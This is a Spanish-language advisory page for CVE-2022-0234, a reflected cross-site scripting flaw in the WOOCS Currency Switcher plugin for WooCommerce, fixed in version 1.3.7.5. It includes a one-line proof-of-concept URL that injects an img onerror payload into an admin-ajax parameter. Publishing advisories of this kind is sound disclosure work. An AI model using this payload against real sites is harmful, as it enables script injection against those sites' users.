Vulnerabilidades

WOOCS – Currency Switcher for WooCommerce <= 1.3.7.4

Plugin:

WOOCS – Currency Switcher for WooCommerce

Severidad de la vulnerabilidad:

6.1 Media

Estado:

Corregido en la actualización 1.3.7.5

Clasificación:

Reflected Cross-Site Scripting

Tipo: XSS

OWASP top 10: A7: Cross-Site Scripting (XSS)

CWE: CWE-79

Referencias:

CVE: CVE-2022-0234

https://plugins.trac.wordpress.org/changeset/2659191

Prueba de Concepto:

				
					https://example.com/wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img src onerror=alert(`XSS`)>

Lo más reciente

Elementor Pro 3.6.3 Gratis

UpdraftPlus Free < 1.22.3 & Premium < 2.22.3

Elementor Pro 3.6.2 Gratis

Ultimate Reviews <= 3.0.15

Elementor Pro 3.6.1 Gratis

Astra Pro Addon Plugin 3.6.5 Gratis

Essential Addons for Elementor < 5.0.5

Elementor Pro 3.6.0 Gratis

Shield Security <= 13.0.5

WOOCS – Currency Switcher for WooCommerce <= 1.3.7.4

¿Quieres recibir las últimas actualizaciones?